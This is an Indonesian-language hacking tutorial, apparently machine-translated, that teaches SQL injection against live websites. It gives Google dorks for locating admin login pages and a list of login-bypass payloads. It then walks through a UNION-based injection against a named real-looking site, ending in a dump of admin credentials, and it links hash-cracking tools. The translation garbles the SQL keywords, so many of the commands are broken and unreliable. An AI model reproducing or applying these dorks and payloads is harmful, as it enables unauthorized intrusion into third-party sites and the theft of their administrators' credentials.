toturial 1

Hello setiap orang.Saya akan berbagi dengan salah satu yang terbaik tutorial saya di sini.
Sekarang Mari kita mulai!
Sql injeksi (alias Sql Injection atau Injection Structured Query Language) adalah langkah pertama dalam entri untuk mengeksploitasi atau hacking website. Hal ini mudah dilakukan dan merupakan titik awal dari yang besar. Sayangnya kebanyakan menghisap sqli tutorial, sehingga itulah sebabnya saya menulis yang satu ini. Sqli pada dasarnya hanya menyuntikkan query ke dalam database atau menggunakan query untuk mendapatkan otorisasi memotong sebagai seorang admin.
Hal yang harus Anda ketahui:Data dalam kolom dan kolom dalam tabel dan tabel dalam database.Hanya ingat bahwa begitu Anda memahami sisanya.
BAGIAN 1Melewati login admin diMendapatkan melewati auth di account admin.
Kebanyakan situs rentan terhadap ini. AspPertama kita perlu 2 menemukan sebuah situs, mulai dengan membuka google.Sekarang kita ketik dork kami: "defenition of dork" 'entri pencarian untuk jenis tertentu dari situs / mengeksploitasi dll ".Ada sejumlah besar google dork untuk injeksi sql dasar.di sini adalah yang terbaik:
Kode:"Inurl: admin.asp""Inurl: login / admin.asp""Inurl: admin / login.asp""Inurl: adminlogin.asp""Inurl: adminhome.asp""Inurl: admin_login.asp""Inurl: administratorlogin.asp""Inurl: login / administrator.asp""Inurl: administrator_login.asp"Sekarang apa yang harus dilakukan setelah kita mendapatkan ke situs kami.situs harus terlihat seperti ini:ADMIN USERNAME:PASSWORD:
jadi apa yang kita lakukan di sini adalah username kita selalu ketik "Admin"dan untuk password kita kita ketik kita injeksi sql
di sini adalah daftar dari sql injeksiKode:'Atau '1' = '1'Atau' x '=' x'Atau 0 = 0 -
"Atau 0 = 0 -
atau 0 = 0 -
'Atau 0 = 0 #
"Atau 0 = 0 #
atau 0 = 0 #
'Atau' x '=' x
"Atau" x "=" x
') Atau (' x '=' x
'Atau 1 = 1 -
"Atau 1 = 1 -
atau 1 = 1 -
'Atau a = -
"Atau" "=" a
') Atau (' a '=' a
") Atau (" a "=" a
hi "atau" "=" a
hi "atau 1 = 1 -
hi 'atau 1 = 1 -'Or'1 = 1'Jadi masukan Anda akan terlihat seperti ini
username: Adminsandi: 'or'1' = '1yang akan membingungkan situs dan memberikan otorisasi untuk masuk sebagai admin
Jika situs rentan daripada Anda berada di: D
BAGIAN 2Mencari Situs untuk Suntikkan
Mencari SQLI Rentan duduk sangat mudah semua yang perlu Anda lakukan adalah beberapa Googling. Hal pertama yang perlu Anda lakukan adalah menemukan beberapa Dorks.Ambil SQLI Dorks daftar dari sini: http://www.mediafire.com/?y7v30lcj0kn8836http://adf.ly/cjpJ <sandi --- adalah suatu tempat di dalamnyaPS: Saya tidak menempatkan mereka di thread karena saya melewati batas hitungan ...Pilih salah satu dari mereka Dorks dan menambahkan inurl: sebelum (Jika mereka tidak memilikinya) dan kemudian copy dan paste ke google. Pilih salah satu situs dari google dan pergi ke sana.Misalnya url dari halaman Anda berada di mungkin terlihat seperti ini:

    Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

Untuk memeriksa bahwa itu adalah rentan yang harus Anda lakukan adalah menambahkan 'a
Jadi link kami akan terlihat seperti itu:

    Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=10 '
Tekan enter dan Anda mendapatkan beberapa jenis kesalahan. Kesalahan akan bervariasi ...
Halaman kami harus seperti itu: (Klik untuk Lihat)Setelah Anda menemukan situs Anda rentan langkah pertama yang perlu Anda ambil adalah untuk menemukan jumlah kolom. Cara termudah untuk melakukan ini adalah tulisan "order by" jumlah kolom dan kita menambahkan "-" setelah nomor.Link kami akan terlihat seperti itu:

    Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15 -
Jika Anda mendapatkan error yang berarti Anda harus menurunkan jumlah kolom.Mari kita coba 10.

    Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10 -
Halaman dibuka secara normal itu berarti jumlah kolom adalah antara 10 dan 14.Kami mencoba sekarang 11.

    Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11 -
Halaman dibuka biasanya terlalu ...Mari kita coba 12.

    Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12 -
Kami punya kesalahan. Itu berarti jumlah kolom adalah 11 karena kita punya kesalahan pada 12 dan 11 dibuka secara normal.
Menemukan Kolom diaksesSekarang bahwa kita memiliki jumlah kolom yang kita butuhkan untuk mendapatkan nomor kolom yang kita bisa ambil informasi dari.Kita dapat melakukannya dengan menambahkan sebuah "-" sebelum "10" menggantikan "order by #" dengan "serikat semua pilih" dan kolom nomorLink kami akan terlihat seperti itu:

    Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7,8,9,10,11 -
Kita harus mendapatkan nomor.
Halaman kami harus seperti itu: (Klik untuk Lihat)
Untuk bagian akhir url, (1,2,3,4,5,6,7,8,9,10,11) Anda menempatkan jumlah kolom yang Anda temukan pada langkah pertama. Sejak saya menemukan bahwa situs saya sedang menguji memiliki 11 kolom, saya meletakkan 1,2,3,4,5,6,7,8,9,10,11 -Jumlah ini nomor Colum kita bisa mendapatkan informasi dari. Kami akan menggantinya dengan sesuatu yang lain nanti jadi menulis mereka bawah jika Anda inginkan.
Mendapatkan Versi Basis DataKami menemukan bahwa kolom 8, 3, 4 dan 5 yang rentan jadi kita akan menggunakannya untuk mendapatkan versi database.Mengapa kita melakukannya?Jika database berada di bawah 5 yang berarti kita harus menebak nama tabelUntuk melakukan itu kita perlu mengganti salah satu dari kolom rentan dengan "verion @ @"Mari kita kolom 8.Link kami akan terlihat seperti itu:

    Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7, @ @ versi ,9,10,11 -

Halaman harus terlihat seperti itu: (Klik untuk Lihat)
Dalam kasus kami, kami mendapat "5.0.77"> nya 5 sehingga kami dapat terus.
Sekarang kita perlu untuk mendapatkan nama tabel kita ingin mengakses:Untuk melakukannya kita perlu mengganti "@ @ version" dengan "table_name" dan menambahkan setelah nomor kolom terakhir "dari information_schema.tables" dan menambahkan "-" pada akhirnya.Link harus seperti itu:

    Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7, table_name, 9,10,11 dari information_schema.tables -

Halaman harus terlihat seperti itu: (Klik untuk Lihat)
Sekarang kita akan mencari tabel yang ingin kita akses.Kita harus sesuatu yang baik dengan admin di atasnya dan dalam kasus kami itu tbladmin
Spoiler (Klik untuk Lihat)
Sekarang kita perlu untuk mendapatkan nilai ASCII dari "tbladmin".Apa itu ASCII?http://en.wikipedia.org/wiki/ASCII_valueSekarang untuk mendapatkan nilai ASCII dari "tbladmin" pergi ke situs: http://getyourwebsitehere.com/jswb/text_to_ascii.html
Spoiler (Klik untuk Lihat)
Sekarang masukkan dalam kotak pertama nama tabel yang "tbladmin" dalam kasus kami dan klik dikonversi ke ASCII.Anda akan mendapatkan sebagai nilai yang:Kode:tbladminSekarang menghapus karakter sebagai & #; dan kami menambahkan koma "," antara setiap nomor.Ini harus seperti itu:Kode:116,98,108,97,100,109,105,110
Spoiler (Klik untuk Lihat)
Sekarang kita ganti dalam URL yang "table_name" untuk "nama_kolom" dan mengubah "information_schema.tables" untuk "information_schema.columns dan menambahkan" mana nama_tabel = char (nilai ASCII) -dalam kasus kami di tempat (nilai ASCII) kami menempatkan (116,98,108,97,100,109,105,110) -URL kita akan terlihat seperti itu:

    Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7, nama_kolom, 9,10,11 dari information_schema.columns mana nama_tabel = char (116,98,108,97,100,109,105,110) -
Halaman kami harus seperti itu:
Spoiler (Klik untuk Lihat)
Sekarang kita mencari kolom bernama "username" dan "password" atau sesuatu seperti itu.Dalam kasus kami itu adalah "username" dan "password".Sekarang kita dapat menghapus sebagian besar URL.Menghapus semuanya setelah 11 dan menambahkan: "dari tbladmin" Dan ganti "nama_kolom" dengan "concat (username, 0x3a, password)0x3a adalah nilai ASCII dari: sehingga kita dapat memisahkan nama pengguna dari password.URL kita akan terlihat seperti itu:

    Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7, concat (username, 0x3a, sandi), 9, 10,11 dari tbladmin
Halaman kami harus seperti itu:
Spoiler (Klik untuk Lihat)
Dan Anda sudah selesai username dan password ishir ishir123Beberapa kali sandi dienkripsi dengan kilatan.Menggunakan detektor Hash saya untuk tahu apa itu dan mendekripsi online.http://www.mediafire.com/?7qd7t6r3b13ccq4<---- http://adf.ly/cjpJ password di suatu tempat:)Dan Kami Selesai!
Saya harap Anda menyukai tutorial saya.SEMUA kredit pergi ke saya!Terima kasih untuk membaca thread tersebut.
Posted in: injeksi SQL